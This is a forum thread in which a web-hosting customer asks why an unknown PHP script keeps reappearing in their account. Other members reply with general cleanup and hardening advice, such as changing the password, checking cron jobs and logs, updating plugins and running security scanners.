1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Some fucker keeps uploading a php script to my hosting account what to do?

Discussion in 'Black Hat SEO Tools' started by I wear slippers, Nov 19, 2015.

  1. I wear slippers

    I wear slippers Junior Member

    Joined:
    Sep 21, 2015
    Messages:
    124
    Likes Received:
    18
    I had kept getting resource overload messages and so I was slowly going through clearing out old domains. While I was doing so I noticed some php script in the home directory. I had no idea what it was. I checked my entry processes at the time and they were high and as soon as I deleted this php file they went back to 0.

    So I hadn't been having any issues with resource emails from my provider since then for 4 or 5 days but today I looked in my email and there was another message. So I look in the home folder and lo and behold yet another rogue php script and entry processes running high.

    Now I didn't change my password last time but this time I deleted the script and also changed my password.

    Will this be enough or do I have to take more measures. If so what?
     
  2. MoneyEagle

    MoneyEagle Regular Member

    Joined:
    Nov 6, 2015
    Messages:
    328
    Likes Received:
    146
    Gender:
    Male
    Occupation:
    Internet Marketing
    Changing password seems the only possible solution. Also try contacting your hosting / vps service provider about this issue.
     
  3. HoNeYBiRD

    HoNeYBiRD Jr. VIP Jr. VIP

    Joined:
    May 1, 2009
    Messages:
    7,314
    Likes Received:
    8,281
    Gender:
    Male
    Occupation:
    Geographer, Tourism Manager
    Location:
    Ghosted
    well, it can be quite a few things

    the least possible scenario that someone bruteforced your acc, more possible a keylogger on your system or there was a breach on 000webhost not too long ago, where 13 million user account were compromised, even if it's not the hosting provider you're talking about, it can be that someone is playing smart and trying the same username:password combo on other hosting providers as well, so if you have an acc with 000webhost and re-using the same username:password on other sites, that can be an explanation too, changing your password in that case is enough, but if the rogue php script still gets uploaded after you changed your password, then you have a keylogger, which you need to remove, in that case just to be sure, change your password from a different machine (which is not on the same network)
     
  4. Conor

    Conor Elite Member

    Joined:
    Nov 7, 2012
    Messages:
    3,577
    Likes Received:
    5,955
    Gender:
    Male
    Location:
    South Africa
    Home Page:
    Check your cron jobs.

    I recently worked on a site with a cron job that kept recreating an infected file on the server.
     
  5. whiteroot

    whiteroot Junior Member

    Joined:
    Oct 22, 2015
    Messages:
    102
    Likes Received:
    32
    Gender:
    Male
    Occupation:
    Software engineer, freelancer
    Location:
    France
    if after changing your password, you still have the script created, it can be an exploit against your software, whatever it is (wordpress, joomla, prestashop...)
    is it up-to-date ?
    it may come from a plugin too - are they up-to-date ?
    bought/downloaded from a safe place ? if not, remove the suspicious one
    check the apache log to find a suspicious request (ask your hosting comp if you don't have them)
    but whatever you decide, tell them about this, they may help
     
  6. Seo Lover

    Seo Lover Jr. Executive VIP Jr. VIP

    Joined:
    Jan 30, 2011
    Messages:
    5,899
    Likes Received:
    4,214
    Gender:
    Male
    Occupation:
    Hanging Around Interawebs !
    Location:
    <-----------------Sin City
  7. twitter.followers

    twitter.followers Jr. VIP Jr. VIP

    Joined:
    Mar 23, 2011
    Messages:
    1,830
    Likes Received:
    2,220
    Since it has happened with you twice in a row, either you have a keylogger running on your computer. Get a better antivirus to track it down and clean your system.

    OR it could be an issue with your hosting if as mentioned above is a cheap unreliable one, its time to switch!
     
  8. MaestroDelWeb

    MaestroDelWeb Executive VIP

    Joined:
    Nov 5, 2007
    Messages:
    816
    Likes Received:
    872
    Occupation:
    Jack of all trades.
    Location:
    USA
    I had a similiar issue. It was on a WordPress based site. My host couldn't figure out the problem. They kept scanning, deleting the file, then the next day or a couple of days later the file would come back. I ended up installing WordFence, it found some changed WP files, I reverted them back. It also found another spammer file. Then I ran Sucuri scan, it found a Javascript exploit on one of my pages. I fixed that. Then I ran iTHemes security and it had me make some settings changes. After this my site was completely clean. It wasn't a keylogger or virus on my computer or anything.
     
    • Thanks Thanks x 1
  9. shout

    shout Regular Member

    Joined:
    Jul 22, 2010
    Messages:
    240
    Likes Received:
    54
    Had this happening to me recently - it was an exploit taking advantage of a security hole in one of Wordpress´s outdated plugins - Revolutional Slider. It doesn´t necessarily mean you are dealing with bad host, the attacker may just have found some script/site/plugin that you haven´t updated and that isn´t secure - these kinds of attacks are common. Also, usually just deleting one file doesn´t cut it. He probably has left several backdoors so he can continue doing whatever he is doing.
     
  10. wisdomkid

    wisdomkid Jr. VIP Jr. VIP

    Joined:
    Jun 20, 2011
    Messages:
    2,716
    Likes Received:
    793
    Well, since we haven't heard from you, after changing the password, i don;t know if the attacker might have access to your account anymore.

    BUT if they do, please do check some plugins. They're are the most open doors to getting website attacked.
    Most especially, those plugins which are hardly updated.
     
  11. PaperToy

    PaperToy Regular Member

    Joined:
    Jul 2, 2013
    Messages:
    334
    Likes Received:
    89
    What I don't get is why you didn't change the password last time when this happened...
     
  12. Asif WILSON Khan

    Asif WILSON Khan Executive VIP Jr. VIP

    Joined:
    Nov 10, 2012
    Messages:
    12,171
    Likes Received:
    33,766
    Gender:
    Male
    Occupation:
    Fun Lovin' Criminal
    Location:
    London
    Home Page:
  13. Cnotey

    Cnotey Power Member

    Joined:
    Jun 25, 2010
    Messages:
    713
    Likes Received:
    915
    Location:
    Seattle
    Home Page:
    What is the script doing? Can you copy/paste it here? Might be able to help a little better.
     
  14. I wear slippers

    I wear slippers Junior Member

    Joined:
    Sep 21, 2015
    Messages:
    124
    Likes Received:
    18
    Thanks for suggestions. I was engrossed in coding which is why I didn't check :). I feel so cool to call myself a coder now. It is like the pornstar or model of the IM world.

    Well I didn't change the password the first time because I wasn't even sure it was someone else's code or just a script I'd forgotten about that was running on it's own but now it repappeared it seems more the former.

    I will look at suggestions properly in the morning.